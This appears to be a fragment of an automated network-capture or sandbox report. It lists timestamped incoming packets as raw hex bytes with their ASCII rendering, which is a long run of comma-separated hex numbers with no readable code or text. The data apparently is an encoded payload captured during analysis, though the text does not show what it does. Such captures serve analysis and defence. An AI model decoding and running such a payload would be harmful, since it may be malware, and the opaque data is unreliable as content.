                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1023INData Raw: 31 33 65 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 63 36 2c 31 34 35 2c 31 33 62 2c 31 30 63 2c 39 31 2c 31 30 32 2c 35 66 2c 31 35 61 2c 36 37 2c 63 32 2c 31 33 62 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 38 64 2c 31 33 32 2c 31 30 64 2c 31 31 35 2c 36 39 2c 31 32 66 2c 37 31 2c 31 32 63 2c 66 64 2c 38 64 2c 31 36 30 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 61 39 2c 31 35 64 2c 31 32 64 2c 66 37 2c 37 33 2c 31 31 65 2c 37 32 2c 31 34 64 2c 31 35 36 2c 62 64 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 61 36 2c 31 36 38 2c 36 34 2c 65 64 2c 65 32 2c 31 31 39 2c 36 37 2c 31 34 39 2c 63 65 2c 62 39 2c 31 34 38 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 63 62 2c 31 33 34 2c 62 37 2c 63 30 2c 31 33 62 2c 31 33 35 2c 36 31 2c 31 33 38 2c 31 35 32 2c 64 38 2c 31 34
                                                                                                                                                                                                                            Data Ascii: 13e,15d,13d,143,c6,145,13b,10c,91,102,5f,15a,67,c2,13b,168,134,125,8d,132,10d,115,69,12f,71,12c,fd,8d,160,134,140,122,a9,15d,12d,f7,73,11e,72,14d,156,bd,135,165,14b,15e,a6,168,64,ed,e2,119,67,149,ce,b9,148,137,129,12a,cb,134,b7,c0,13b,135,61,138,152,d8,14
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1039INData Raw: 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 62 32 2c 31 36 35 2c 65 65 2c 31 35 33 2c 31 34 35 2c 31 33 37 2c 31 32 61 2c 31 31 37 2c 65 31 2c 62 38 2c 31 34 32 2c 31 35 34 2c 31 33 65 2c 31 35 36 2c 63 36 2c 31 33 37 2c 66 32 2c 31 32 38 2c 31 36 61 2c 31 30 33 2c 31 33 35 2c 31 31 34 2c 64 39 2c 65 33 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 63 38 2c 31 35 38 2c 62 38 2c 31 32 36 2c 31 33 30 2c 31 33 33 2c 31 33 66 2c 31 35 30 2c 63 65 2c 65 65 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 62 66 2c 31 35 34 2c 31 31 30 2c 31 35 30 2c 31 35 32 2c 31 30 36 2c 31 31 63 2c 31 31 63 2c 65 62 2c 62 61 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 62 61 2c 31 34 33 2c 36 65 2c 31 33 33 2c 31 34 36 2c 31 32 36 2c 31 34 35 2c 31 31 62 2c
                                                                                                                                                                                                                            Data Ascii: 14b,158,153,129,b2,165,ee,153,145,137,12a,117,e1,b8,142,154,13e,156,c6,137,f2,128,16a,103,135,114,d9,e3,13d,143,15c,145,c8,158,b8,126,130,133,13f,150,ce,ee,134,125,123,132,bf,154,110,150,152,106,11c,11c,eb,ba,140,122,13f,15d,ba,143,6e,133,146,126,145,11b,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1055INData Raw: 30 34 2c 64 38 2c 31 35 32 2c 31 34 35 2c 65 35 2c 31 34 39 2c 39 65 2c 61 37 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 62 36 2c 31 36 30 2c 31 32 39 2c 31 30 66 2c 65 36 2c 31 33 30 2c 64 63 2c 31 34 35 2c 38 39 2c 64 34 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 64 62 2c 31 32 63 2c 31 32 38 2c 31 30 63 2c 66 65 2c 31 35 62 2c 64 37 2c 31 33 34 2c 39 36 2c 63 33 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 61 66 2c 31 35 64 2c 36 37 2c 31 34 35 2c 66 66 2c 31 36 36 2c 63 64 2c 31 31 36 2c 35 35 2c 62 30 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 63 33 2c 31 32 66 2c 33 38 2c 31 31 31 2c 31 32 30 2c 31 33 32 2c 64 39 2c 31 31 33 2c 36 38 2c 64 62 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 63 35 2c 31 35 30 2c 31 35
                                                                                                                                                                                                                            Data Ascii: 04,d8,152,145,e5,149,9e,a7,135,165,14b,15e,b6,160,129,10f,e6,130,dc,145,89,d4,149,137,129,12a,db,12c,128,10c,fe,15b,d7,134,96,c3,14b,158,153,129,af,15d,67,145,ff,166,cd,116,55,b0,142,154,146,156,c3,12f,38,111,120,132,d9,113,68,db,13d,143,15c,145,c5,150,15
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1071INData Raw: 2c 31 34 33 2c 31 33 62 2c 31 31 66 2c 31 34 62 2c 31 35 38 2c 31 35 31 2c 31 32 39 2c 34 61 2c 31 33 38 2c 31 34 62 2c 31 35 65 2c 31 33 62 2c 31 36 38 2c 31 31 33 2c 66 66 2c 31 32 33 2c 31 33 32 2c 31 34 30 2c 31 35 34 2c 35 62 2c 31 32 39 2c 31 34 39 2c 31 33 37 2c 31 32 36 2c 31 32 61 2c 62 37 2c 64 36 2c 31 34 30 2c 31 32 32 2c 31 33 65 2c 31 35 64 2c 31 31 63 2c 31 31 64 2c 31 35 63 2c 31 34 35 2c 31 34 39 2c 31 35 38 2c 36 38 2c 66 63 2c 31 33 35 2c 31 36 35 2c 31 34 61 2c 31 35 65 2c 31 31 62 2c 31 34 32 2c 31 33 34 2c 31 32 35 2c 31 32 31 2c 31 33 32 2c 35 37 2c 31 32 37 2c 31 34 36 2c 31 35 36 2c 31 34 36 2c 31 33 37 2c 37 66 2c 63 63 2c 31 36 31 2c 31 33 34 2c 31 33 66 2c 31 32 32 2c 31 31 65 2c 31 33 37 2c 31 33 64 2c 31 34 33 2c 31 35 61 2c
                                                                                                                                                                                                                            Data Ascii: ,143,13b,11f,14b,158,151,129,4a,138,14b,15e,13b,168,113,ff,123,132,140,154,5b,129,149,137,126,12a,b7,d6,140,122,13e,15d,11c,11d,15c,145,149,158,68,fc,135,165,14a,15e,11b,142,134,125,121,132,57,127,146,156,146,137,7f,cc,161,134,13f,122,11e,137,13d,143,15a,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1087INData Raw: 61 2c 31 35 65 2c 38 37 2c 66 36 2c 31 33 34 2c 31 32 35 2c 31 32 31 2c 31 33 32 2c 35 37 2c 65 66 2c 31 34 36 2c 31 35 36 2c 31 34 38 2c 31 33 37 2c 37 34 2c 62 38 2c 31 36 31 2c 31 33 34 2c 31 33 66 2c 31 32 32 2c 38 61 2c 65 62 2c 31 33 64 2c 31 34 33 2c 31 35 62 2c 31 34 35 2c 39 36 2c 65 36 2c 31 35 33 2c 31 32 39 2c 31 33 33 2c 31 36 35 2c 31 30 63 2c 66 33 2c 31 33 63 2c 31 36 38 2c 31 33 33 2c 31 32 35 2c 36 65 2c 63 30 2c 31 34 32 2c 31 35 34 2c 31 34 35 2c 31 35 36 2c 39 34 2c 63 35 2c 31 32 39 2c 31 32 61 2c 31 36 30 2c 31 33 34 2c 38 62 2c 62 30 2c 31 33 66 2c 31 35 64 2c 31 33 63 2c 31 34 33 2c 61 37 2c 64 33 2c 31 34 62 2c 31 35 38 2c 31 35 32 2c 31 32 39 2c 38 30 2c 66 33 2c 31 34 62 2c 31 35 65 2c 31 33 62 2c 31 36 38 2c 37 66 2c 62 33 2c
                                                                                                                                                                                                                            Data Ascii: a,15e,87,f6,134,125,121,132,57,ef,146,156,148,137,74,b8,161,134,13f,122,8a,eb,13d,143,15b,145,96,e6,153,129,133,165,10c,f3,13c,168,133,125,6e,c0,142,154,145,156,94,c5,129,12a,160,134,8b,b0,13f,15d,13c,143,a7,d3,14b,158,152,129,80,f3,14b,15e,13b,168,7f,b3,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1091INData Raw: 35 2c 36 65 2c 63 30 2c 31 34 32 2c 31 35 34 2c 31 34 34 2c 31 35 36 2c 63 61 2c 66 33 2c 31 32 39 2c 31 32 61 2c 31 36 30 2c 31 33 34 2c 38 62 2c 62 30 2c 31 33 66 2c 31 35 64 2c 31 33 62 2c 31 34 33 2c 64 64 2c 31 30 31 2c 31 34 62 2c 31 35 38 2c 31 35 30 2c 31 32 39 2c 39 31 2c 31 31 33 2c 31 34 62 2c 31 35 65 2c 31 33 62 2c 31 36 38 2c 37 66 2c 62 33 2c 31 32 33 2c 31 33 32 2c 31 34 30 2c 31 35 34 2c 31 30 31 2c 63 36 2c 31 34 39 2c 31 33 37 2c 31 32 38 2c 31 32 61 2c 61 63 2c 63 32 2c 31 34 30 2c 31 32 32 2c 31 33 64 2c 31 35 64 2c 66 38 2c 62 33 2c 31 35 63 2c 31 34 35 2c 31 34 38 2c 31 35 38 2c 61 66 2c 64 37 2c 31 33 35 2c 31 36 35 2c 31 34 61 2c 31 35 65 2c 38 37 2c 66 36 2c 31 33 34 2c 31 32 35 2c 31 32 32 2c 31 33 32 2c 38 64 2c 65 32 2c 31 34
                                                                                                                                                                                                                            Data Ascii: 5,6e,c0,142,154,144,156,ca,f3,129,12a,160,134,8b,b0,13f,15d,13b,143,dd,101,14b,158,150,129,91,113,14b,15e,13b,168,7f,b3,123,132,140,154,101,c6,149,137,128,12a,ac,c2,140,122,13d,15d,f8,b3,15c,145,148,158,af,d7,135,165,14a,15e,87,f6,134,125,122,132,8d,e2,14
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1107INData Raw: 36 2c 31 31 31 2c 31 35 33 2c 31 32 39 2c 31 33 34 2c 31 36 35 2c 62 37 2c 66 33 2c 31 33 63 2c 31 36 38 2c 31 33 33 2c 31 32 35 2c 61 62 2c 65 34 2c 31 34 32 2c 31 35 34 2c 31 34 35 2c 31 35 36 2c 64 31 2c 65 39 2c 31 32 39 2c 31 32 61 2c 31 36 30 2c 31 33 34 2c 38 62 2c 62 30 2c 31 33 66 2c 31 35 64 2c 31 33 62 2c 31 34 33 2c 64 35 2c 64 34 2c 31 34 62 2c 31 35 38 2c 31 35 32 2c 31 32 39 2c 38 30 2c 66 33 2c 31 34 62 2c 31 35 65 2c 31 33 62 2c 31 36 38 2c 37 66 2c 62 33 2c 31 32 33 2c 31 33 32 2c 31 34 31 2c 31 35 34 2c 39 31 2c 65 34 2c 31 34 39 2c 31 33 37 2c 31 32 37 2c 31 32 61 2c 64 61 2c 63 33 2c 31 34 30 2c 31 32 32 2c 31 33 65 2c 31 35 64 2c 38 38 2c 64 31 2c 31 35 63 2c 31 34 35 2c 31 34 61 2c 31 35 38 2c 39 65 2c 62 37 2c 31 33 35 2c 31 36 35
                                                                                                                                                                                                                            Data Ascii: 6,111,153,129,134,165,b7,f3,13c,168,133,125,ab,e4,142,154,145,156,d1,e9,129,12a,160,134,8b,b0,13f,15d,13b,143,d5,d4,14b,158,152,129,80,f3,14b,15e,13b,168,7f,b3,123,132,141,154,91,e4,149,137,127,12a,da,c3,140,122,13e,15d,88,d1,15c,145,14a,158,9e,b7,135,165
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1123INData Raw: 2c 31 33 64 2c 31 35 64 2c 39 35 2c 62 61 2c 31 35 63 2c 31 34 35 2c 31 34 38 2c 31 35 38 2c 31 35 35 2c 62 33 2c 31 33 35 2c 31 36 35 2c 31 34 37 2c 31 35 65 2c 31 33 32 2c 31 30 64 2c 31 33 34 2c 31 32 35 2c 31 32 32 2c 31 33 32 2c 38 64 2c 65 32 2c 31 34 36 2c 31 35 36 2c 31 34 37 2c 31 33 37 2c 38 31 2c 61 31 2c 31 36 31 2c 31 33 34 2c 31 33 64 2c 31 32 32 2c 31 34 31 2c 65 37 2c 31 33 64 2c 31 34 33 2c 31 35 38 2c 31 34 35 2c 31 33 38 2c 31 31 65 2c 31 35 33 2c 31 32 39 2c 31 33 34 2c 31 36 35 2c 39 36 2c 65 63 2c 31 33 63 2c 31 36 38 2c 31 33 32 2c 31 32 35 2c 37 62 2c 61 39 2c 31 34 32 2c 31 35 34 2c 31 34 33 2c 31 35 36 2c 31 34 62 2c 63 31 2c 31 32 39 2c 31 32 61 2c 31 35 64 2c 31 33 34 2c 31 32 64 2c 65 38 2c 31 33 66 2c 31 35 64 2c 31 33 38 2c
                                                                                                                                                                                                                            Data Ascii: ,13d,15d,95,ba,15c,145,148,158,155,b3,135,165,147,15e,132,10d,134,125,122,132,8d,e2,146,156,147,137,81,a1,161,134,13d,122,141,e7,13d,143,158,145,138,11e,153,129,134,165,96,ec,13c,168,132,125,7b,a9,142,154,143,156,14b,c1,129,12a,15d,134,12d,e8,13f,15d,138,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1139INData Raw: 2c 31 34 32 2c 31 35 34 2c 31 34 35 2c 31 35 36 2c 36 64 2c 62 35 2c 31 32 39 2c 31 32 61 2c 31 35 66 2c 31 33 34 2c 64 64 2c 65 38 2c 31 33 66 2c 31 35 64 2c 31 33 63 2c 31 34 33 2c 38 30 2c 63 33 2c 31 34 62 2c 31 35 38 2c 31 35 31 2c 31 32 39 2c 64 32 2c 31 32 62 2c 31 34 62 2c 31 35 65 2c 31 33 39 2c 31 36 38 2c 31 30 38 2c 61 38 2c 31 32 33 2c 31 33 32 2c 31 34 31 2c 31 35 34 2c 36 61 2c 64 34 2c 31 34 39 2c 31 33 37 2c 31 32 37 2c 31 32 61 2c 66 65 2c 66 61 2c 31 34 30 2c 31 32 32 2c 31 33 65 2c 31 35 64 2c 36 31 2c 63 31 2c 31 35 63 2c 31 34 35 2c 31 34 61 2c 31 35 38 2c 37 37 2c 61 37 2c 31 33 35 2c 31 36 35 2c 31 34 39 2c 31 35 65 2c 31 31 30 2c 65 62 2c 31 33 34 2c 31 32 35 2c 31 32 32 2c 31 33 32 2c 36 36 2c 64 32 2c 31 34 36 2c 31 35 36 2c 31
                                                                                                                                                                                                                            Data Ascii: ,142,154,145,156,6d,b5,129,12a,15f,134,dd,e8,13f,15d,13c,143,80,c3,14b,158,151,129,d2,12b,14b,15e,139,168,108,a8,123,132,141,154,6a,d4,149,137,127,12a,fe,fa,140,122,13e,15d,61,c1,15c,145,14a,158,77,a7,135,165,149,15e,110,eb,134,125,122,132,66,d2,146,156,1
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1155INData Raw: 31 32 2c 36 61 2c 31 32 33 2c 34 36 2c 31 31 39 2c 61 31 2c 31 31 38 2c 31 31 33 2c 31 36 38 2c 39 65 2c 39 63 2c 65 36 2c 31 33 30 2c 31 31 39 2c 31 35 34 2c 64 62 2c 64 30 2c 31 32 32 2c 31 33 35 2c 63 30 2c 31 32 61 2c 38 62 2c 62 38 2c 38 64 2c 64 63 2c 35 36 2c 31 35 37 2c 31 31 30 2c 66 38 2c 61 32 2c 66 66 2c 66 61 2c 31 35 38 2c 31 30 65 2c 65 61 2c 66 33 2c 31 31 66 2c 64 61 2c 31 35 65 2c 39 39 2c 31 34 34 2c 65 33 2c 31 32 34 2c 62 32 2c 31 33 32 2c 39 39 2c 31 33 30 2c 66 35 2c 31 35 35 2c 64 38 2c 31 33 37 2c 36 31 2c 63 63 2c 39 39 2c 65 65 2c 63 66 2c 31 32 32 2c 37 39 2c 31 30 35 2c 36 66 2c 66 64 2c 31 31 62 2c 31 34 35 2c 31 32 61 2c 65 34 2c 38 30 2c 65 33 2c 31 31 63 2c 31 35 65 2c 31 31 30 2c 65 31 2c 66 64 2c 31 36 38 2c 31 30 62 2c
                                                                                                                                                                                                                            Data Ascii: 12,6a,123,46,119,a1,118,113,168,9e,9c,e6,130,119,154,db,d0,122,135,c0,12a,8b,b8,8d,dc,56,157,110,f8,a2,ff,fa,158,10e,ea,f3,11f,da,15e,99,144,e3,124,b2,132,99,130,f5,155,d8,137,61,cc,99,ee,cf,122,79,105,6f,fd,11b,145,12a,e4,80,e3,11c,15e,110,e1,fd,168,10b,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1171INData Raw: 33 33 2c 31 34 32 2c 39 31 2c 31 31 62 2c 31 34 66 2c 63 66 2c 62 63 2c 31 35 63 2c 39 31 2c 31 32 31 2c 31 32 62 2c 31 30 65 2c 37 33 2c 31 31 64 2c 36 39 2c 66 35 2c 31 32 61 2c 66 61 2c 35 35 2c 31 34 65 2c 38 66 2c 66 61 2c 31 30 36 2c 64 30 2c 62 30 2c 31 32 62 2c 38 36 2c 65 35 2c 31 31 31 2c 31 30 33 2c 38 34 2c 31 33 61 2c 61 32 2c 31 30 38 2c 31 31 32 2c 66 65 2c 65 32 2c 31 32 33 2c 37 62 2c 31 32 38 2c 31 30 62 2c 31 30 34 2c 37 62 2c 31 35 66 2c 37 61 2c 65 38 2c 64 38 2c 64 38 2c 35 31 2c 31 34 64 2c 31 32 37 2c 31 31 63 2c 63 33 2c 31 32 36 2c 33 38 2c 31 32 33 2c 31 34 32 2c 66 61 2c 62 32 2c 31 31 31 2c 34 65 2c 31 35 36 2c 31 31 65 2c 31 30 39 2c 62 62 2c 31 33 34 2c 35 61 2c 31 35 31 2c 62 66 2c 66 61 2c 37 61 2c 31 35 34 2c 37 61 2c 31
                                                                                                                                                                                                                            Data Ascii: 33,142,91,11b,14f,cf,bc,15c,91,121,12b,10e,73,11d,69,f5,12a,fa,55,14e,8f,fa,106,d0,b0,12b,86,e5,111,103,84,13a,a2,108,112,fe,e2,123,7b,128,10b,104,7b,15f,7a,e8,d8,d8,51,14d,127,11c,c3,126,38,123,142,fa,b2,111,4e,156,11e,109,bb,134,5a,151,bf,fa,7a,154,7a,1
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1187INData Raw: 2c 31 33 37 2c 35 34 2c 31 32 36 2c 37 37 2c 31 33 33 2c 31 32 65 2c 31 32 32 2c 35 65 2c 31 35 39 2c 35 33 2c 31 34 32 2c 31 34 61 2c 31 34 35 2c 35 65 2c 31 35 34 2c 36 39 2c 31 32 38 2c 31 32 33 2c 31 36 35 2c 31 30 36 2c 31 35 39 2c 35 32 2c 31 36 37 2c 31 32 63 2c 31 32 35 2c 64 32 2c 31 32 64 2c 64 33 2c 31 34 64 2c 31 33 65 2c 31 35 36 2c 65 63 2c 31 33 32 2c 62 61 2c 31 32 33 2c 31 35 39 2c 31 33 34 2c 61 63 2c 31 31 64 2c 38 37 2c 31 32 39 2c 31 33 35 2c 31 34 33 2c 63 34 2c 31 34 30 2c 38 65 2c 31 32 34 2c 31 34 62 2c 31 32 39 2c 39 63 2c 31 36 30 2c 36 31 2c 31 35 64 2c 31 33 34 2c 31 36 38 2c 39 38 2c 31 32 30 2c 33 39 2c 31 33 31 2c 31 33 61 2c 31 35 34 2c 61 36 2c 31 35 31 2c 38 37 2c 31 30 33 2c 31 32 31 2c 31 32 61 2c 62 64 2c 31 32 66 2c
                                                                                                                                                                                                                            Data Ascii: ,137,54,126,77,133,12e,122,5e,159,53,142,14a,145,5e,154,69,128,123,165,106,159,52,167,12c,125,d2,12d,d3,14d,13e,156,ec,132,ba,123,159,134,ac,11d,87,129,135,143,c4,140,8e,124,14b,129,9c,160,61,15d,134,168,98,120,39,131,13a,154,a6,151,87,103,121,12a,bd,12f,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1203INData Raw: 2c 31 32 65 2c 31 36 38 2c 37 34 2c 65 65 2c 31 32 33 2c 31 33 32 2c 66 66 2c 31 35 33 2c 31 33 38 2c 31 35 36 2c 38 38 2c 31 30 30 2c 31 32 39 2c 31 32 61 2c 61 65 2c 31 33 33 2c 31 33 32 2c 31 32 32 2c 35 66 2c 31 32 36 2c 31 33 64 2c 31 34 33 2c 31 31 39 2c 31 34 34 2c 31 33 64 2c 31 35 38 2c 37 32 2c 66 32 2c 31 33 35 2c 31 36 35 2c 39 38 2c 31 35 64 2c 31 32 65 2c 31 36 38 2c 31 33 34 2c 65 64 2c 31 32 33 2c 31 33 32 2c 66 66 2c 31 35 33 2c 31 33 38 2c 31 35 36 2c 31 34 38 2c 66 66 2c 31 32 39 2c 31 32 61 2c 61 65 2c 31 33 33 2c 31 33 32 2c 31 32 32 2c 31 31 66 2c 31 32 35 2c 31 33 64 2c 31 34 33 2c 31 31 39 2c 31 34 34 2c 31 33 64 2c 31 35 38 2c 31 33 32 2c 66 31 2c 31 33 35 2c 31 36 35 2c 39 38 2c 31 35 64 2c 31 32 65 2c 31 36 38 2c 31 31 30 2c 65
                                                                                                                                                                                                                            Data Ascii: ,12e,168,74,ee,123,132,ff,153,138,156,88,100,129,12a,ae,133,132,122,5f,126,13d,143,119,144,13d,158,72,f2,135,165,98,15d,12e,168,134,ed,123,132,ff,153,138,156,148,ff,129,12a,ae,133,132,122,11f,125,13d,143,119,144,13d,158,132,f1,135,165,98,15d,12e,168,110,e
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1219INData Raw: 2c 31 36 38 2c 37 34 2c 62 33 2c 31 32 33 2c 31 33 32 2c 66 66 2c 31 35 33 2c 31 33 38 2c 31 35 36 2c 36 39 2c 63 35 2c 31 32 39 2c 31 32 61 2c 31 31 65 2c 31 33 33 2c 31 33 32 2c 31 32 32 2c 31 33 66 2c 65 61 2c 31 33 64 2c 31 34 33 2c 31 31 39 2c 31 34 34 2c 31 33 64 2c 31 35 38 2c 31 33 33 2c 62 36 2c 31 33 35 2c 31 36 35 2c 31 30 38 2c 31 35 64 2c 31 32 65 2c 31 36 38 2c 66 34 2c 62 32 2c 31 32 33 2c 31 33 32 2c 66 66 2c 31 35 33 2c 31 33 38 2c 31 35 36 2c 65 39 2c 63 34 2c 31 32 39 2c 31 32 61 2c 31 31 65 2c 31 33 33 2c 31 33 32 2c 31 32 32 2c 62 66 2c 65 61 2c 31 33 64 2c 31 34 33 2c 31 31 39 2c 31 34 34 2c 31 33 64 2c 31 35 38 2c 62 33 2c 62 36 2c 31 33 35 2c 31 36 35 2c 31 30 38 2c 31 35 64 2c 31 32 65 2c 31 36 38 2c 37 34 2c 62 32 2c 31 32 33 2c
                                                                                                                                                                                                                            Data Ascii: ,168,74,b3,123,132,ff,153,138,156,69,c5,129,12a,11e,133,132,122,13f,ea,13d,143,119,144,13d,158,133,b6,135,165,108,15d,12e,168,f4,b2,123,132,ff,153,138,156,e9,c4,129,12a,11e,133,132,122,bf,ea,13d,143,119,144,13d,158,b3,b6,135,165,108,15d,12e,168,74,b2,123,
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1235INData Raw: 66 2c 61 38 2c 31 33 64 2c 31 34 33 2c 31 31 39 2c 31 34 34 2c 31 33 64 2c 31 35 38 2c 66 33 2c 37 34 2c 31 33 35 2c 31 36 35 2c 31 30 38 2c 31 35 64 2c 31 32 65 2c 31 36 38 2c 62 34 2c 37 30 2c 31 32 33 2c 31 33 32 2c 66 66 2c 31 35 33 2c 31 33 38 2c 31 35 36 2c 61 39 2c 38 32 2c 31 32 39 2c 31 32 61 2c 31 31 65 2c 31 33 33 2c 31 33 32 2c 31 32 32 2c 37 66 2c 61 38 2c 31 33 64 2c 31 34 33 2c 31 31 39 2c 31 34 34 2c 31 33 64 2c 31 35 38 2c 37 33 2c 37 34 2c 31 33 35 2c 31 36 35 2c 31 30 38 2c 31 35 64 2c 31 32 65 2c 31 36 38 2c 31 33 34 2c 36 66 2c 31 32 33 2c 31 33 32 2c 66 66 2c 31 35 33 2c 31 33 38 2c 31 35 36 2c 31 32 39 2c 38 31 2c 31 32 39 2c 31 32 61 2c 31 31 65 2c 31 33 33 2c 31 33 32 2c 31 32 32 2c 66 66 2c 61 37 2c 31 33 64 2c 31 34 33 2c 31 31
                                                                                                                                                                                                                            Data Ascii: f,a8,13d,143,119,144,13d,158,f3,74,135,165,108,15d,12e,168,b4,70,123,132,ff,153,138,156,a9,82,129,12a,11e,133,132,122,7f,a8,13d,143,119,144,13d,158,73,74,135,165,108,15d,12e,168,134,6f,123,132,ff,153,138,156,129,81,129,12a,11e,133,132,122,ff,a7,13d,143,11
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1251INData Raw: 2c 39 38 2c 31 35 64 2c 31 32 65 2c 31 36 38 2c 66 34 2c 31 30 62 2c 31 32 32 2c 31 33 32 2c 38 66 2c 31 35 33 2c 31 33 38 2c 31 35 36 2c 65 39 2c 31 31 64 2c 31 32 38 2c 31 32 61 2c 61 65 2c 31 33 33 2c 31 33 32 2c 31 32 32 2c 62 66 2c 31 34 33 2c 31 33 63 2c 31 34 33 2c 61 39 2c 31 34 34 2c 31 33 64 2c 31 35 38 2c 62 33 2c 31 30 66 2c 31 33 34 2c 31 36 35 2c 39 38 2c 31 35 64 2c 31 32 65 2c 31 36 38 2c 37 34 2c 31 30 62 2c 31 32 32 2c 31 33 32 2c 38 66 2c 31 35 33 2c 31 33 38 2c 31 35 36 2c 36 35 2c 31 31 64 2c 31 32 38 2c 31 32 61 2c 37 65 2c 31 33 33 2c 31 33 32 2c 31 32 32 2c 64 66 2c 31 34 32 2c 31 33 63 2c 31 34 33 2c 61 39 2c 31 34 34 2c 31 33 64 2c 31 35 38 2c 64 33 2c 31 30 65 2c 31 33 34 2c 31 36 35 2c 39 38 2c 31 35 64 2c 31 32 65 2c 31 36 38
                                                                                                                                                                                                                            Data Ascii: ,98,15d,12e,168,f4,10b,122,132,8f,153,138,156,e9,11d,128,12a,ae,133,132,122,bf,143,13c,143,a9,144,13d,158,b3,10f,134,165,98,15d,12e,168,74,10b,122,132,8f,153,138,156,65,11d,128,12a,7e,133,132,122,df,142,13c,143,a9,144,13d,158,d3,10e,134,165,98,15d,12e,168
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1267INData Raw: 32 31 2c 31 33 32 2c 31 32 33 2c 31 35 33 2c 66 35 2c 31 35 36 2c 31 34 37 2c 31 33 37 2c 31 30 39 2c 31 32 39 2c 31 30 65 2c 31 33 34 2c 31 33 65 2c 31 32 32 2c 31 31 65 2c 31 35 63 2c 65 38 2c 31 34 33 2c 31 35 61 2c 31 34 35 2c 31 32 35 2c 31 35 37 2c 66 63 2c 31 32 39 2c 31 33 34 2c 31 36 35 2c 31 32 34 2c 31 35 64 2c 65 35 2c 31 36 38 2c 31 33 32 2c 31 32 35 2c 66 62 2c 31 33 31 2c 65 39 2c 31 35 34 2c 31 34 35 2c 31 35 36 2c 31 32 30 2c 31 33 36 2c 64 30 2c 31 32 61 2c 31 35 66 2c 31 33 34 2c 66 38 2c 31 32 31 2c 65 34 2c 31 35 64 2c 31 33 62 2c 31 34 33 2c 31 30 32 2c 31 34 34 2c 65 65 2c 31 35 38 2c 31 35 31 2c 31 32 39 2c 64 30 2c 31 35 64 2c 65 63 2c 31 35 65 2c 31 33 61 2c 31 36 38 2c 37 37 2c 31 31 64 2c 63 32 2c 31 33 32 2c 31 34 31 2c 31 35
                                                                                                                                                                                                                            Data Ascii: 21,132,123,153,f5,156,147,137,109,129,10e,134,13e,122,11e,15c,e8,143,15a,145,125,157,fc,129,134,165,124,15d,e5,168,132,125,fb,131,e9,154,145,156,120,136,d0,12a,15f,134,f8,121,e4,15d,13b,143,102,144,ee,158,151,129,d0,15d,ec,15e,13a,168,77,11d,c2,132,141,15
                                                                                                                                                                                                                            2023-11-04 00:35:23 UTC1283INData Raw: 2c 31 32 33 2c 31 33 32 2c 31 33 65 2c 31 35 34 2c 39 64 2c 31 34 65 2c 62 32 2c 31 31 33 2c 31 32 38 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 39 37 2c 31 31 61 2c 36 36 2c 64 63 2c 31 33 64 2c 31 34 33 2c 31 35 38 2c 31 34 35 2c 61 30 2c 31 35 30 2c 62 63 2c 31 30 35 2c 31 33 35 2c 31 36 35 2c 31 34 37 2c 31 35 65 2c 38 66 2c 31 36 30 2c 39 64 2c 31 30 31 2c 31 32 33 2c 31 33 32 2c 31 33 65 2c 31 35 34 2c 39 37 2c 31 34 65 2c 62 32 2c 31 31 33 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 38 64 2c 31 31 61 2c 62 30 2c 31 32 34 2c 31 33 63 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 39 38 2c 31 35 30 2c 37 61 2c 61 38 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 38 37 2c 31 36 30 2c 61 35 2c 65 63 2c 31 32 32 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 39
                                                                                                                                                                                                                            Data Ascii: ,123,132,13e,154,9d,14e,b2,113,128,12a,161,134,97,11a,66,dc,13d,143,158,145,a0,150,bc,105,135,165,147,15e,8f,160,9d,101,123,132,13e,154,97,14e,b2,113,129,12a,161,134,8d,11a,b0,124,13c,143,15c,145,98,150,7a,a8,135,165,14b,15e,87,160,a5,ec,122,132,142,154,9
